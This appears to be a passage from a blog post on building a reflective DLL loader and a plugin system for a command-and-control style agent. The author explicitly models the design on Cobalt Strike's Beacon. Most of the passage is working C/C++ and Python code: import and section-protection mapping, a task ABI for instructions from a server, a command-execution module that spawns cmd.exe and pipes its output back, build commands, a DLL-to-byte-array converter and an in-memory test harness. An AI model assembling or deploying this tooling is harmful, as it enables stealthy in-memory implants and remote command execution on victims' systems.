thunk->u1.Function = (ULONGLONG)addr;
#else
thunk->u1.Function = (DWORD)addr;
#endif
}
}
}
// Final section protections
sec = IMAGE_FIRST_SECTION(nt);
for (int i = 0; i < nt->FileHeader.NumberOfSections; ++i, ++sec) {
DWORD prot = ProtectFromSectionChars(sec->Characteristics);
DWORD old;
SIZE_T size = sec->Misc.VirtualSize ? sec->Misc.VirtualSize : sec->SizeOfRawData;
if (size)
VirtualProtect(base + sec->VirtualAddress, size, prot, &old);
}
// Make headers RX or at least R
{
DWORD old;
VirtualProtect(base, nt->OptionalHeader.SizeOfHeaders, PAGE_READONLY, &old);
}
VirtualFree(raw, 0, MEM_RELEASE);
return base;
}From here, you can call your custom export resolver against the returned base.
Plugin ABI
Task payload
I like a plain C struct of char* + length pairs so modules can stay light and avoid high-level runtime baggage if they want.
typedef struct TaskApi {
const char* TaskId; DWORD TaskIdLen;
const char* Instruction; DWORD InstructionLen;
const char* Command; DWORD CommandLen;
const char* Arguments; DWORD ArgumentsLen;
const char* File; DWORD FileLen;
const char* ExecTime; DWORD ExecTimeLen;
} TaskApi;Interface & exports
Keep the ABI tiny and predictable:
Factory:
create_plugin() → IPlugin*Lifecycle:
plugin_init(IPlugin*),plugin_cleanup(IPlugin*)Dispatch:
plugin_exec(TaskApi* task)Inside the module:
init(),execute(TaskApi*),cleanup()
class IPlugin {
public:
virtual void init() const = 0;
virtual void execute(TaskApi* task) const = 0;
virtual void cleanup() const = 0;
virtual ~IPlugin() = default;
};Keep the same calling convention across the interface and your host typedefs.
Next, some helper functions which I recently came to realize. This is the moment I realized where the Beacon* API functions that the cobalt strike beacon uses come from:
static inline DWORD CStrLenA(const char* s) {
return s ? (DWORD)lstrlenA(s) : 0;
}
static void BeaconCout(const char* s, DWORD len = 0) {
if (!s) return;
HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (!hOut || hOut == INVALID_HANDLE_VALUE) return;
if (len == 0) len = (DWORD)lstrlenA(s);
DWORD n = 0;
WriteFile(hOut, s, len, &n, nullptr);
}
static void BeaconPipeOutput(HANDLE hRead) {
BYTE buf[4096];
for (;;) {
DWORD got = 0;
if (!ReadFile(hRead, buf, sizeof(buf), &got, nullptr) || got == 0) break;
HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (hOut && hOut != INVALID_HANDLE_VALUE) {
DWORD wrote = 0;
WriteFile(hOut, buf, got, &wrote, nullptr);
}
}
}We need these due to the fact that the loaded DLL will execute its own code internally, but we need it to output any information to stdout. In order to achieve this, we need to create wrapper functions around the WriteFile API which displays to standard output.
Next, we create CRT-free memory allocation/deallocation helpers which are just wrappers around the HeapAlloc/HeapFree API to allocate the instance of the plugin and destroy it accordingly:
extern "C" IPlugin* __stdcall create_plugin() {
if (g_plugin) return g_plugin;
void* mem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(Plugin));
if (!mem) return nullptr;
g_plugin = ::new (mem) Plugin();
return g_plugin;
}
extern "C" void __stdcall destroy_plugin(IPlugin* p) {
if (!p) return;
p->~IPlugin();
HeapFree(GetProcessHeap(), 0, p);
if (p == g_plugin) g_plugin = nullptr;
}Finally, we create the export functions which the agent will receive in order to handle the DLL:
extern "C" void __stdcall plugin_init(IPlugin* p) {
if (!p) p = create_plugin();
if (p) p->init();
}
extern "C" void __stdcall plugin_exec(TaskApi* task) {
if (!g_plugin) g_plugin = create_plugin();
if (g_plugin) g_plugin->execute(task);
}
extern "C" void __stdcall plugin_cleanup(IPlugin* p) {
if (!p) p = g_plugin;
if (p) p->cleanup();
}Example Module: Command Execution
Here’s a simple module that runs a command via CreateProcess with an inherited pipe, and streams stdout/stderr back through your chosen channel:
#include <Windows.h>
#include <new>
#include "IPlugin.h"
// ---------- run command & pipe to current console ----------
static DWORD RunAndPipeToConsole(const char* cmd, DWORD cmdLen) {
// Default to "whoami" if none provided
static const char kDefault[] = "whoami";
if (!cmd || cmdLen == 0) {
cmd = kDefault;
cmdLen = (DWORD)sizeof(kDefault) - 1;
}
SECURITY_ATTRIBUTES sa{};
sa.nLength = sizeof(sa);
sa.bInheritHandle = TRUE;
HANDLE hRead = nullptr, hWrite = nullptr;
if (!CreatePipe(&hRead, &hWrite, &sa, 0)) return GetLastError();
// Child inherits only the write end
SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0);
STARTUPINFOA si{};
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
si.hStdOutput = hWrite;
si.hStdError = hWrite;
PROCESS_INFORMATION pi{};
// Build mutable "cmd.exe /c <cmd>"
static const char kPrefix[] = "C:\\Windows\\System32\\cmd.exe /c ";
const DWORD prefixLen = (DWORD)sizeof(kPrefix) - 1;
const DWORD totalLen = prefixLen + cmdLen;
char* full = (char*)HeapAlloc(GetProcessHeap(), 0, totalLen + 1);
if (!full) {
CloseHandle(hRead); CloseHandle(hWrite);
return ERROR_OUTOFMEMORY;
}
CopyMemory(full, kPrefix, prefixLen);
CopyMemory(full + prefixLen, cmd, cmdLen);
full[totalLen] = '\0';
BOOL ok = CreateProcessA(
nullptr,
full, // mutable buffer
nullptr, nullptr,
TRUE, // inherit write end
0,
nullptr, nullptr,
&si, &pi
);
CloseHandle(hWrite); // parent never writes
if (!ok) {
DWORD le = GetLastError();
HeapFree(GetProcessHeap(), 0, full);
CloseHandle(hRead);
return le;
}
BeaconPipeOutput(hRead);
WaitForSingleObject(pi.hProcess, INFINITE);
DWORD code = 0; GetExitCodeProcess(pi.hProcess, &code);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(hRead);
HeapFree(GetProcessHeap(), 0, full);
return code;
}Keep this logic with the module, not in the shared header—otherwise every plugin drags command-runner baggage along for the ride. Compile this DLL using the following command:
cl.exe /W0 /D_USRDLL /D_WINDLL *.cpp /MT /link /DLL /OUT:cmdplugin.dllEmbedding a DLL as Bytes (for Testing)
I keep a tiny script around that turns a compiled DLL into a C/C++ byte array for fast experiments:
import sys
import os
from textwrap import wrap
def file_to_cpp_hex_array(filename, var_name="embeddedBytes", bytes_per_line=16):
try:
with open(filename, "rb") as f:
data = f.read()
except Exception as e:
print(f"Failed to read file: {e}")
return
size = len(data)
hex_lines = []
for line in wrap(data.hex(), bytes_per_line * 2): # 2 hex chars per byte
hex_bytes = ", ".join(f"0x{line[i:i+2]}" for i in range(0, len(line), 2))
hex_lines.append(f" {hex_bytes},")
cpp_code = f"""\
#include <cstdint>
constexpr std::size_t {var_name}_size = {size};
const uint8_t {var_name}[] = {{
{os.linesep.join(hex_lines)}
}};
"""
print(cpp_code)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 file2hex.py <filename> [var_name]")
else:
file_to_cpp_hex_array(
filename=sys.argv[1],
var_name=sys.argv[2] if len(sys.argv) >= 3 else "embeddedBytes"
)Executing this script with the output piped to clip:
python .\file2hex.py .\cmdplugin.dll cmd_dll | clipYields the following to your clipboard which you can save in TestDll.h:
#include <cstdint>
constexpr std::size_t cmd_dll_size = 105472;
const uint8_t cmd_dll[] = {
0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
...
...
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};Host Test Harness
A simple harness maps the module once, resolves exports, constructs the plugin, and dispatches a test task.
Watch out though, the variable does contain 13000+ lines.
We plug this in to our test reflective loader and we proceed to test it! We will be using the following to execute our command:
#include <iostream>
#include "IPlugin.h"
#include "TestDll.h"
#include "ReflectiveLoaderEngine.h"
using CreatePlugin_t = IPlugin * (__stdcall*)();
using DestroyPlugin_t = void(__stdcall*)(IPlugin*);
using PluginInit_t = void(__stdcall*)(IPlugin*);
using PluginExec_t = void(__stdcall*)(const TaskApi*);
using PluginCleanup_t = void(__stdcall*)(IPlugin*);
void Test_Extension_CMD(const char* cmd) {
MemModule mod = MapImage(cmd_dll, cmd_dll_size);
if (!mod.base) { std::cerr << "[-] map failed\n"; return; }
auto create_plugin = (CreatePlugin_t)GetExport(mod, "create_plugin");
auto destroy_plugin = (DestroyPlugin_t)GetExport(mod, "destroy_plugin");
auto plugin_init = (PluginInit_t)GetExport(mod, "plugin_init");
auto plugin_exec = (PluginExec_t)GetExport(mod, "plugin_exec");
auto plugin_cleanup = (PluginCleanup_t)GetExport(mod, "plugin_cleanup");
if (!create_plugin || !destroy_plugin || !plugin_init || !plugin_exec || !plugin_cleanup) {
std::cerr << "[-] missing one or more exports\n"; return;
}
IPlugin* plugin = create_plugin();
if (!plugin) { std::cerr << "[-] create_plugin returned null\n"; return; }
plugin_init(plugin);
TaskApi task{};
task.TaskId = "local-test"; task.TaskIdLen = (DWORD)lstrlenA(task.TaskId);
task.Instruction = "exec"; task.InstructionLen = (DWORD)lstrlenA(task.Instruction);
task.Command = cmd; task.CommandLen = (cmd ? (DWORD)lstrlenA(cmd) : 0);
plugin_exec(&task);
plugin_cleanup(plugin);
destroy_plugin(plugin);
}
void main() {
// This is simulating an instruction received by your server.
// Assume the command is "dir"
TaskApi* task = new TaskApi;
task->Command = "dir";
Test_Extension_CMD(task->Command);
}
Checklist for the harness:
Map once and resolve all exports from that same mapped base.
Create/destroy via the exported functions (don’t mix in
delete).Pass a fully populated
TaskApi*(usenull+0for absent fields).Clean up handles and free buffers even on error paths.
Extensions
Once the ABI is in place, adding modules is boring—in a good way:
init()for per-module setupexecute(TaskApi*)for the actual workcleanup()for teardown
The agent doesn’t need to know how you did it—only how to map, resolve, and call.
IPlugin.h
Here’s the full IPlugin.h you can standardize on:
#pragma once
#include <Windows.h>
#ifndef PLUGIN_CALL
#define PLUGIN_CALL __stdcall
#endif
#ifndef PLUGIN_EXPORT
#define PLUGIN_EXPORT extern "C" __declspec(dllexport)
#endif
typedef struct TaskApi {
const char* TaskId; DWORD TaskIdLen;
const char* Instruction; DWORD InstructionLen;
const char* Command; DWORD CommandLen;
const char* Arguments; DWORD ArgumentsLen;
const char* File; DWORD FileLen;
const char* ExecTime; DWORD ExecTimeLen;
} TaskApi;
class IPlugin {
public:
virtual void init() const = 0;
virtual void execute(TaskApi* task) const = 0;
virtual void cleanup() const = 0;
virtual ~IPlugin() = default;
};
static inline DWORD CStrLenA(const char* s) {
return s ? (DWORD)lstrlenA(s) : 0;
}
static void BeaconCout(const char* s, DWORD len = 0) {
if (!s) return;
HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (!hOut || hOut == INVALID_HANDLE_VALUE) return;
if (len == 0) len = (DWORD)lstrlenA(s);
DWORD n = 0;
WriteFile(hOut, s, len, &n, nullptr);
}
static void BeaconPipeOutput(HANDLE hRead) {
BYTE buf[4096];
for (;;) {
DWORD got = 0;
if (!ReadFile(hRead, buf, sizeof(buf), &got, nullptr) || got == 0) break;
HANDLE hOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (hOut && hOut != INVALID_HANDLE_VALUE) {
DWORD wrote = 0;
WriteFile(hOut, buf, got, &wrote, nullptr);
}
}
}
static inline void* PluginAlloc(SIZE_T sz, BOOL zero = TRUE) {
return HeapAlloc(GetProcessHeap(), zero ? HEAP_ZERO_MEMORY : 0, sz);
}
static inline void PluginFree(void* p) {
if (p) HeapFree(GetProcessHeap(), 0, p);
}
PLUGIN_EXPORT IPlugin* PLUGIN_CALL create_plugin();
PLUGIN_EXPORT void PLUGIN_CALL destroy_plugin(IPlugin*);
PLUGIN_EXPORT void PLUGIN_CALL plugin_init(IPlugin*);
PLUGIN_EXPORT void PLUGIN_CALL plugin_exec(TaskApi* task);
PLUGIN_EXPORT void PLUGIN_CALL plugin_cleanup(IPlugin*);Going Forward
If you want this to scale without pain:
Keep a single canonical header for the ABI and shared helpers.
Decide “CRT or no CRT” per module and document it.
Be explicit about what your mapper supports (relocs/imports/protections) and what it doesn’t (TLS, delay-load, forwarded exports, CFG, SEH tables).
Add targeted tests (missing imports, weird sections, map/unmap cycles). Future-you will be grateful.
Conclusions
If there’s a single lesson I’m taking away from this little adventure, it’s that “reflective loading” stops being a magic trick the moment you understand the moving parts. It’s just the PE lifecycle—headers, sections, relocations, imports, protections—played back on your own terms. That doesn’t make it trivial (I lost entire evenings to off-by-one bugs in relocation blocks and forgetting to set final page protections), but it does make it tractable. And once you can map a DLL from bytes reliably, a clean plugin ABI feels like the obvious next step rather than a leap of faith.
The second lesson is about restraint. It’s tempting to bolt every clever idea onto the mapper: TLS callbacks, delay-loads, forwarded exports, CFG tables, SEH registration, thread-local storage, the works. Ask me how I know. In practice, the small boring mapper that does the minimum well is the one you’ll trust to ship. Push anything module-specific into the modules. Keep the interface tight and predictable. When you need to extend it, extend it deliberately—prefer an extra field in your task struct over a one-off “special case” that only one module understands.
There are tradeoffs worth calling out. Compared to BOFs, reflective DLLs can feel heavier and noisier; compared to regular DLLs, they can be brittle if your mapper only supports a subset of PE features. That’s okay—just be explicit about your contract. Document what your loader guarantees (relocs/imports/protections) and what it doesn’t (TLS, delay-load, forwarded exports). If a module needs something exotic, either teach the mapper that one new trick or reject the module early with a clear error. Silent half-support is the worst failure mode..
Finally, a note on scope and responsibility. Techniques like these are powerful, and like most powerful things, they can be used in ways that help or harm. For my part, this work came out of curiosity about loaders, a desire to build smaller, more modular tooling, and a genuine love for understanding how Windows actually works under the hood. If you take anything from this post, let it be the craft: build carefully, measure honestly, write down the edges, and leave it cleaner than you found it.
References (for further reading)
Stephen Fewer — Reflective DLL Injection (paper & code)
ired.team — Manual mapping / PE loader notes
Overview: Reflective DLL Injection
Supporting technique: Dynamically Resolve API Addresses via PEB Microsoft Learn
MemoryModule (Joachim Bauch) — “Load a DLL from memory” library & tutorial
Library: fancycode/MemoryModule (GitHub)
Microsoft Learn — PE/COFF spec, IMAGE structures, loader-relevant APIs_*
PE/COFF spec: PE Format Microsoft Learn
IMAGE headers: IMAGE_NT_HEADERS32 · IMAGE_NT_HEADERS64 · IMAGE_FILE_HEADER Microsoft Learn
APIs: VirtualAlloc · VirtualProtect · CreateProcessA · CreatePipe Microsoft Learn
Windows Internals, Part 1 (7th Edition)
Publisher page: Windows Internals, Part 1, 7th Edition (Microsoft Press Store) Microsoft Press Store
Practical Reverse Engineering (Dang, Gazet, Bachaalany, Josse)
Publisher page: Practical Reverse Engineering (Wiley) Wiley
Think Like a Programmer (V. Anton Spraul)
Publisher page: Think Like a Programmer (No Starch Press)
Last updated